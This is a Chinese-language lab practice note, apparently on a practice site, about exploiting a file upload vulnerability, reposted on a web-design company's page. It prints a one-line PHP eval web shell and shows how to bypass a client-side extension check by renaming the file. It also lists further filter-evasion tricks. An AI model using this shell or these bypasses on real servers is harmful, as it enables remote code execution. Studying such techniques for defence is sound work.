文件上傳漏洞練習筆記(1)

(1)打開網(wǎng)站
文件上傳漏洞練習筆記(1)
(2)我們注意到一個圖片上傳,先傳個jpg看看
文件上傳漏洞練習筆記(1)
(3)結果中可以看到Stored in: upload/Tulips.jpg
先記一下,這個是文件的保存路徑,后邊會用到。
下邊開始看看傳其他文件,php,或隨便一個后綴名文件,探究他的過濾能力
我寫了個php文件為1text.php

從網(wǎng)站建設到定制行業(yè)解決方案,為提供網(wǎng)站建設、網(wǎng)站設計服務體系,各種行業(yè)企業(yè)客戶提供網(wǎng)站建設解決方案,助力業(yè)務快速發(fā)展。成都創(chuàng)新互聯(lián)公司將不斷加快創(chuàng)新步伐,提供優(yōu)質的建站服務。

<?php @eval($_POST['c']);?>  

文件上傳漏洞練習筆記(1)

(4)我們發(fā)現(xiàn)不能上傳文件,可是又抓包抓不到,可以判定,在本地做了文件過濾
這時候,我們可以看看源代碼,發(fā)現(xiàn)有后綴名的校驗

文件上傳漏洞練習筆記(1)

(5)我們現(xiàn)在把1test.php改為1test.jpg

文件上傳漏洞練習筆記(1)

(6)可以發(fā)現(xiàn)文件是可以上傳成功的。
文件上傳漏洞練習筆記(1)

(7)但顯然,這個也不是我們要的結果,jpg格式不能直接解析
這個時候,我們想想是不是可以在上傳的時候將文件名改回php

文件上傳漏洞練習筆記(1)

(8)居然成功了,,我們菜刀連一下,。。網(wǎng)速太渣,就這樣把

文件上傳漏洞練習筆記(1)



(9)下邊提升下難度,如果上傳不成功,

 使用大小寫測試,或加 1 2 3 4 5 等,再或者嘗試pht文件

標題名稱:文件上傳漏洞練習筆記(1)
分享路徑:http://muchs.cn/article40/jepsho.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供移動網(wǎng)站建設小程序開發(fā)、云服務器、定制網(wǎng)站、、定制開發(fā)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉載內(nèi)容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯(lián)

h5響應式網(wǎng)站建設